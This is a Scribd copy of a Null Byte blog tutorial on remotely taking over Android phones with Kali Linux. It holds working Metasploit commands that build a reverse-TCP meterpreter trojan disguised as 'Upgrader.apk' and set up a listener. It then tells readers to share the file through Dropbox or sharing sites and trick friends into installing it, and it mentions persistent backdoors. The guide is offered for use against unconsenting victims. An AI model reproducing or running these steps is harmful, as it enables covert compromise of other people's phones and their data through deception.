100% found this document useful (1 vote)
906 views5 pages

How To Hack Android Using Kali (Remotely) Null Byte - WonderHowTo

This document provides a 5-step tutorial for remotely hacking an Android phone using Kali Linux. The steps are: 1. Create a trojan APK payload on Kali Linux to establish a reverse TCP connection. 2. Start a Metasploit listener on Kali to receive the connection. 3. Send the trojan APK to the target phone and trick them into installing it. 4. When installed, the trojan will call back and a meterpreter session is opened, allowing remote control of the phone. 5. The attacker can then exploit the phone from Kali through the meterpreter session.

Uploaded by

Shivank Baghel
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
100% found this document useful (1 vote)
906 views5 pages

How To Hack Android Using Kali (Remotely) Null Byte - WonderHowTo

This document provides a 5-step tutorial for remotely hacking an Android phone using Kali Linux. The steps are: 1. Create a trojan APK payload on Kali Linux to establish a reverse TCP connection. 2. Start a Metasploit listener on Kali to receive the connection. 3. Send the trojan APK to the target phone and trick them into installing it. 4. When installed, the trojan will call back and a meterpreter session is opened, allowing remote control of the phone. 5. The attacker can then exploit the phone from Kali through the meterpreter session.

Uploaded by

Shivank Baghel
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

11/1/2019 How to Hack Android Using Kali (Remotely) « Null Byte :: WonderHowTo

FORUM  

NULL BYTE

H OW TO

Hack Android Using Kali (Remotely)


BY F.E.A.R.  02/10/2015 8:06 AM ANDROID

H ello Hackers! Welcome to my 2nd Post:


This is a tutorial explaining how to hack android phones with Kali.
I can't see any tutorials explaining this Hack/Exploit, so, I made one.
(Still ,you may already know about this)

Step 1

Fire-Up Kali:
Open a terminal, and make a Trojan .apk
You can do this by typing :
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk
(replace LHOST with your own IP)
You can also hack android on WAN i.e. through Interet by using your Public/External IP in the
LHOST and by port forwarding (ask me about port forwarding if you have problems in the

https://null-byte.wonderhowto.com/how-to/hack-android-using-kali-remotely-0160161/ 1/5
11/1/2019 How to Hack Android Using Kali (Remotely) « Null Byte :: WonderHowTo

comment section)

Step 2

Open Another Terminal:


Open another terminal until the file is being produced.
Load metasploit console, by typing : msfconsole

Step 3

Set-Up a Listener:
After it loads(it will take time), load the multi-handler exploit by typing : use
exploit/multi/handler

https://null-byte.wonderhowto.com/how-to/hack-android-using-kali-remotely-0160161/ 2/5
11/1/2019 How to Hack Android Using Kali (Remotely) « Null Byte :: WonderHowTo

Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp


To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your
private/internal IP here not the public/external)

Step 4

Exploit!
At last type: exploit to start the listener.
Copy the application that you made (Upgrader.apk) from the root folder, to you android
phone.

Then send it using Uploading it to Dropbox or any sharing website (like:


www.speedyshare.com).
Then send the link that the Website gave you to your friends and exploit their phones (Only
on LAN, but if you used the WAN method then you can use the exploit anywhere on the
INTERNET)

https://null-byte.wonderhowto.com/how-to/hack-android-using-kali-remotely-0160161/ 3/5
11/1/2019 How to Hack Android Using Kali (Remotely) « Null Byte :: WonderHowTo

Let the Victim install the Upgrader app(as he would think it is meant to upgrade some
features on his phone)
However, the option of allowance for Installation of apps from Unknown Sources should be
enabled (if not) from the security settings of the android phone to allow the Trojan to install.
And when he clicks Open...

Step 5

BOOM!
There comes the meterpreter prompt:

------------------------------------------HACKED-------------------------------------------------

The END:
Keep coming for more!
Some post modules that work for windows might not work in android

https://null-byte.wonderhowto.com/how-to/hack-android-using-kali-remotely-0160161/ 4/5
11/1/2019 How to Hack Android Using Kali (Remotely) « Null Byte :: WonderHowTo

For Eg: run killav, persistence (persistent backdoor) etc.

Thank You!
F.E.A.R.

Follow Null Byte on Twitter, Flipboard, and YouTube


Sign up for Null Byte's weekly newsletter

Never Miss a Hacking or Security Guide


Get new Null Byte guides every week.

Your Email

 SIGN
SIGN UP

WonderHowTo.com About Us Privacy Policy Terms of Use


Don't Miss:
New iOS 13 Features — The 200+ Best, Hidden & Most Exciting New Changes for iPhone
20+ Features in iOS 13's Safari You Don't Want to Miss
31 New Features for Camera & Photos in iOS 13
22 New Features in iOS 13's Mail App to Help You Master the Art of the Email
How to Request Desktop or Mobile Web Pages in iOS 13
iOS 13 Changes How to Edit & Select Text, Move Selections, & Place the Cursor
How to Change Your iMessage Profile Picture & Display Name in iOS 13

https://null-byte.wonderhowto.com/how-to/hack-android-using-kali-remotely-0160161/ 5/5

You might also like